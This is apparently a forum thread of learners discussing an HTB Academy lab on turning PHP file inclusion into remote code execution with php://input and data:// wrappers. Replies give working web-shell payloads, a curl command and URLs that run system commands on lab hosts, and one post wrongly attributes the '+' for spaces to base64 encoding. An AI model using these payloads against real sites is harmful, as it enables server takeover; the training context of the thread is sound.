Try to gain RCE using one of the PHP wrappers and read the flag at / file inclusion PHP wrappers

I am learning HTB academy file inclusion topic, while doing PHP wrappers module. I am able to get the web shell but from web shell I am not able to get the reverse shell and flag also.
Here the question is find the flag at / with PHP wrappers, How should I know where flag file is located.

I got the web shell and I am able to run the id and ls and some commands but i am not find the flag, how should i find the flag where is located / means root or home directory, I am trying this from one week, there is no hints for the question.

2 Likes

Hey not sure if you got this already but I would start by listing the root directory with something like ls / or ls+/ in the url friendly form.
-onthesauce

1 Like

I am also getting the same issue from last 2 weeks, I got the web shell but I haven’t get the reverse shell and I am able to find out the flag at /. what is this mean, it mean root directory or home directory.

There is find command is there, when I try the find command: find /home -n name flag.txt

The file is not located and I am not able to find out the flag.

Are anyone found this from somewhere, Give me some hints.

First, we need to run the “pwd” command to check the current working directory. the output will be “/var/www/html” . After this we need to list all directories in " / " folder command for this is " ls+/ ".The output will have a text file " .txt ".we can use the cat command to see the flag inside the txt file.
command: " cat …/…/…/[name_of_text_file].txt "

NOTE: the name of file which has flag is not flag it is some random characters

3 Likes

curl -s -X POST --data ‘<?php system($_GET["cmd"]); ?>’ “http://46.101.14.124:32568/index.php?language=php://input&cmd=cat+/37809e2f8952f06139011994726d9ef1.txt
try this command

2 Likes

Thanks with this help I was able to complete the module.

But what I am wondering about is, where does the “+” come from when you are trying to pass the command for “ls /”? I realize the + is taking the place of the space in a multi worded command… but why +? I literally do not know why I would use a + in this case. Some kind of encoding? But not url. Because a space translates to something like %20

1 Like

also like this ,
http://ip:port/shell.php?cmd=cat+/37809e2f8952f06139011994726d9ef1.txt

1 Like

http://IP:port/index.php?language=./profile_images/shell.gif&cmd=cat%20/xxxxxxxxxxxxxxxxxxx.txt

your hint about ls+/ was what I needed. The moment I got ls+/ and seeing the file in / in it. this exercise is done. next is just cat+filename.txt

What I think is - The URL is encoded in base64. When a URL is encoded in base64, any spaces in the URL are replaced with the + character.

I saw a discussion here -Is a space possible in a base64 encoding? - Stack Overflow

Therefore, http://Ip address:port/index.php?language= data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls+/, which would be decoded as http://94.237.62.195:57310/index.php?language=data://text/plain;base64,<?php system($_GET["cmd"]); ?>&cmd=ls%20/.

that is what i think of why + is used for ls+/ and cat+filename.txt in the command.

Is my understanding correct ? anyone has any idea ?

the random characters .txt you mentioned was really helpful man. Thnx